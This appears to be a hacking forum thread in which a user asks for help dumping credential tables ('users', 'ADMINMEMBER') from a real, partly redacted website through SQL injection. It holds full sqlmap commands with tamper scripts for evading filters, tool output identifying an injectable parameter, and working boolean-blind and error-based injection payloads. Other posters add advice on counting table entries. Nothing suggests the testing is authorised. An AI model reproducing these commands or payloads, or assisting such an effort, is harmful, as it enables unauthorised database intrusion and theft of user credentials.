hello everybody , i use sqlmap then query and get all name table and name columns for ready ,but when i do a dump : | item | | location | | profile_pic | | rdreamboard26 | | refbrgy | | refcitymun | | refprovince | | refregion | | region | | reply | | reply_new | | sub_category | | test | | test2 | | users ----------------- and column of Table users | username | password ----------------- so i use dump sqlmap -u "http:website.com" -D hotgamja -T users --dump --no-cast --flush-session --threads=5 --eta --batch and [07:41:26] [INFO] fetching columns for table 'users' in database 'hotgamja' [07:41:35] [INFO] the SQL query used returns 2 entries [07:41:35] [INFO] starting 5 threads [07:45:35] [INFO] fetching entries for table 'users' in database 'hotgamja' [07:45:35] [WARNING] the SQL query provided does not return any output [07:45:35] [INFO] fetching number of entries for table 'users' in database 'hotgamja' [07:45:35] [INFO] retrieved: [07:45:36] [WARNING] unable to retrieve the number of entries for table 'users' in database 'hotgamja' [07:45:36] [INFO] fetched data logged to text files under '/root/.sqlmap/output/ and nothing retrieved so pls help me how can i do it bestter for get access to the data when dump help me pls icq : 692615965 thank so much
first thank for ur help and it still this error can not dump columns info bro.( root@kali:~# sqlmap -u "http://xxxxxx103846" -D hotgamja -T users --dump --no-cast --flush-session --threads=3 --tamper "space2morehash.py" "space2hash.py" "space2mysqlblank.py" "charencode.py" "chardoubleencode.py" "charunicodeencode.py" "percentage.py" --eta --batch --time-sec=10 [07:45:35] [WARNING] the SQL query provided does not return any output [07:45:35] [INFO] fetching number of entries for table 'users' in database 'hotgamja' [07:45:35] [INFO] retrieved: [07:45:36] [WARNING] unable to retrieve the number of entries for table 'users' in database 'hotgamja' bro can you talk with me by icq?
database dump or tables dump or only columns dump all not get any infomation also bro [08:26:25] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql') [08:26:25] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' [08:26:26] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns' [08:26:27] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns' [08:26:35] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns' [08:26:43] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns' [08:26:51] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns' [08:26:58] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns' [08:27:09] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns' [08:27:15] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns' [08:27:25] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns' [08:27:30] [WARNING] parameter length constrainting mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected GET parameter 'x_code' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 234 HTTP(s) requests: --- Parameter: x_code (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: b_code=xxxxx1103846' AND 9168=9168 AND 'BDvf'='BDvf Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: b_code=xxxxx1103846' AND (SELECT 1396 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT (ELT(1396=1396,1))),0x716b787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Akmy'='Akmy --- [08:27:30] [WARNING] changes made by tampering scripts are not included in shown payload content(s) [08:27:30] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.3.29, Apache 2.2.34 back-end DBMS: MySQL >= 5.0 [08:27:30] [INFO] fetching columns for table 'ADMINMEMBER' in database 'hotgamja' [08:28:11] [INFO] the SQL query used returns 8 entries [08:28:11] [INFO] starting 3 threads [08:30:45] [INFO] fetching entries for table 'ADMINMEMBER' in database 'hotgamja' [08:30:45] [WARNING] the SQL query provided does not return any output [08:30:45] [INFO] fetching number of entries for table 'ADMINMEMBER' in database 'hotgamja' [08:30:45] [INFO] retrieved: [08:30:46] [WARNING] unable to retrieve the number of entries for table 'ADMINMEMBER' in database 'hotgamja' [08:30:46] [WARNING] HTTP error codes detected during run: 414 (Request-URI Too Long) - 1 times [08:30:46] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.xxxxx.com' [*] shutting down at 08:30:46 root@kali:~#
yes i look all bro all table | email_user_credit | | email_user_credit_summary | | email_user_stats_emailsperhour | | email_usergroups | | email_usergroups_access | | email_usergroups_permissions | | email_users | | email_whitelabel_settings | | item | | location | | profile_pic | | rdreamboard26 | | refbrgy | | refcitymun | | refprovince | | refregion | | region | | reply | | reply_new | | sub_category | | test | | test2 | | users | +----------------------------------------+ look all column also, but when i have dump then get nothing infomation bro.
try with --count cos possible table doesn't have any info Code: Retrieve number of entries for table(s) Switch: --count In case that user wants just to know the number of entries in table(s) prior to dumping the desired one, he can use this switch. Example against a Microsoft SQL Server target: $ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1"\ --count -D testdb [...] Database: testdb +----------------+---------+ | Table | Entries | +----------------+---------+ | dbo.users | 4 | | dbo.users_blob | 2 | +----------------+---------+
Did you read previous messages?? There all answers on your questions -try with COUNT parameter ,if this will return 0 means table have no any info
[20:11:11] [INFO] fetching tables for database: 'database' [20:11:42] [INFO] the SQL query used returns 269 entries [20:11:56] [INFO] retrieved: AA_test [20:12:10] [INFO] retrieved: ADDSPEC [20:12:26] [INFO] retrieved: ADMINMEMBER check count is working bro
[23:58:39] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.3.29, Apache 2.2.34 back-end DBMS: MySQL >= 5.0 [23:58:55] [INFO] resumed: [23:58:55] [ERROR] unable to retrieve the number of entries for any table [23:58:55] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.xxxxx.com' [*] shutting down at 23:58:55 ( Maybe it was blocked by something